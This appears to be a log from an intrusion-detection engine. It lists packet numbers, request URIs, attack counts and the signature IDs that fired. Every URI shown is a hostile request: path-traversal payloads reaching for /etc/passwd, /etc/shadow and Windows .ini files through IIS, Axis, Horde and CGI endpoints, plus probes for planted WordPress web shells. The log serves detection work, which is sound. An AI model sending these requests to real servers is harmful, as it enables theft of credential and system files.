Packet [1336]	Uri [/web/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1337]	Uri [/web/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1338]	Uri [/web/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1339]	Uri [/web/services/Version?xsd=../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1340]	Uri [/web/axis/services/Version?xsd=../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1341]	Uri [/web/axis2/services/Version?xsd=../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1342]	Uri [/web/imcws/services/Version?xsd=../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1343]	Uri [/web/WebServiceImpl/services/Version?xsd=../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1344]	Uri [/web/dswsbobje/services/Version?xsd=../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1345]	Uri [/web/ws/services/Version?xsd=../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1346]	Uri [/web/../../windows/dvr2.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [1347]	Uri [/web/htdocs/../../../../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [1348]	Uri [/web/help/../../../../../../../../../../../../../../../../etc/shadow]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [1352]	Uri [/web/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [1364]	Uri [/web/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts]	Nattacks [1]	Signatures	[300002734]
Packet [1365]	Uri [/web/wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts]	Nattacks [1]	Signatures	[300002734]
Packet [1366]	Uri [/web/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts]	Nattacks [1]	Signatures	[300002734]
Packet [1367]	Uri [/web/wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts]	Nattacks [1]	Signatures	[300002734]
Packet [1368]	Uri [/web/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts]	Nattacks [1]	Signatures	[300002734]
Packet [1369]	Uri [/web/wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts]	Nattacks [1]	Signatures	[300002734]
Packet [1374]	Uri [/web/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
# N. packets [1374], [518] with alerts, N. Alerts [965]
# Execution time: 0.452491 s
